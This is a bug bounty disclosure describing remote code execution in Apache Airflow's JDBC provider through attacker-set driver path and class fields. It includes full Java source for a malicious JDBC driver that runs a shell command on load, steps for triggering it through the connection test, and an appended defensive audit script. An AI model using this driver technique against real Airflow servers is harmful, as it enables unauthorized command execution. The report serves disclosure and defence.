hackerone / Kmhlyxj0 / H1:2065288
History: Jul 12, 2023 - 11:04 a.m.

Internet Bug Bounty: jdbc apache airflow provider code execution vulnerability

2023-07-12 11:04:08
kmhlyxj0
hackerone.com
$520

In airflow.providers.jdbc.hooks.jdbc.JdbcHook, a privilege escalation vulnerability exists because the Driver Path and Driver Class parameters are controllable, which allows any Java code to be executed.

Vulnerability reproduction steps:

  1. Create a malicious JDBC driver, like this:
import java.io.*;
import java.sql.*;
import java.util.Properties;
import java.util.logging.Logger;

public class Test implements Driver {

    static {
        try {
            cmd();
            DriverManager.registerDriver(new Test());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Connection connect(String url, Properties info) throws SQLException {
        return null;
    }

    @Override
    public boolean acceptsURL(String url) throws SQLException {
        try {
            cmd();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        // Verify whether the URL is one supported by this driver
        return url.startsWith("jdbc:mydb:");
    }

    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
        return new DriverPropertyInfo[0];
    }

    @Override
    public int getMajorVersion() {
        return 1;
    }

    @Override
    public int getMinorVersion() {
        return 0;
    }

    @Override
    public boolean jdbcCompliant() {
        return false;
    }

    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        return null;
    }

    public static void cmd() throws IOException {
        String[] cmd = {"sh", "-c", "whoami"}; 
        Process p = Runtime.getRuntime().exec(cmd);
        InputStream in = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        File outputFile = new File("/tmp/airflow-jdbc.txt");
        BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));
        String line;
        while ((line = reader.readLine()) != null) {
            writer.write(line);
            writer.newLine();
        }
        writer.close();
    }
}

    Then generate a jar package from it.

  2. Configure the JDBC connection
    Go to the Connection configuration page.
    Fill in the driver path with the path of the jar package generated in the previous step.
    Fill in the driver class with the value Test.

  3. Click on the test button
    Click on the test button; the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.

This is a screenshot of my email exchange with Airflow developers:

███
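
A defensive check for the issue described above, as an added example that is not part of the original report or of Airflow's own code: it audits stored connection records and flags JDBC connections whose driver path resolves outside a trusted directory or whose driver class is not allowlisted. The extra key names, the trusted directory, the allowlist and the sample records are assumptions constructed for illustration.

```python
import json
import os

# Assumed extra keys behind the "Driver Path" / "Driver Class" form fields;
# adjust them to what your provider version actually stores.
PATH_KEYS = ("driver_path", "extra__jdbc__drv_path")
CLASS_KEYS = ("driver_class", "extra__jdbc__drv_clsname")
TRUSTED_DIR = "/opt/airflow/jdbc-drivers"    # hypothetical admin-owned directory
ALLOWED_CLASSES = {"org.postgresql.Driver"}  # hypothetical allowlist

def audit_jdbc_connection(conn, trusted_dir=TRUSTED_DIR, allowed=ALLOWED_CLASSES):
    """Return findings for one connection record (a dict); empty list means clean."""
    if conn.get("conn_type") != "jdbc":
        return []
    try:
        extra = json.loads(conn.get("extra") or "{}")
    except ValueError:
        return ["extra is not valid JSON"]
    if not isinstance(extra, dict):
        return ["extra is not a JSON object"]
    findings = []
    root = os.path.realpath(trusted_dir)
    for key in PATH_KEYS:
        # Assumption: the value may list several jars separated by commas.
        jars = [p.strip() for p in str(extra.get(key) or "").split(",")]
        for jar in filter(None, jars):
            # realpath collapses ".." and symlinks before the containment test.
            if os.path.commonpath([root, os.path.realpath(jar)]) != root:
                findings.append(f"{key}: jar outside trusted dir: {jar}")
    for key in CLASS_KEYS:
        if extra.get(key) and str(extra[key]) not in allowed:
            findings.append(f"{key}: class not allowlisted: {extra[key]}")
    return findings

def audit_all(connections):
    """Map conn_id -> findings for every connection that has at least one."""
    report = {c["conn_id"]: audit_jdbc_connection(c) for c in connections}
    return {cid: found for cid, found in report.items() if found}

# Constructed sample records, shaped like rows exported from a connection store.
SAMPLE = [
    {"conn_id": "pg", "conn_type": "postgres", "extra": ""},
    {"conn_id": "ok", "conn_type": "jdbc", "extra": json.dumps(
        {"driver_path": TRUSTED_DIR + "/postgresql.jar",
         "driver_class": "org.postgresql.Driver"})},
    {"conn_id": "bad", "conn_type": "jdbc", "extra": json.dumps(
        {"driver_path": TRUSTED_DIR + "/../../../tmp/uploaded.jar",
         "driver_class": "Test"})},
]
```

Calling `audit_all(SAMPLE)` reports only the `bad` record, once for the jar path that escapes the trusted directory through `..` and once for the `Test` driver class.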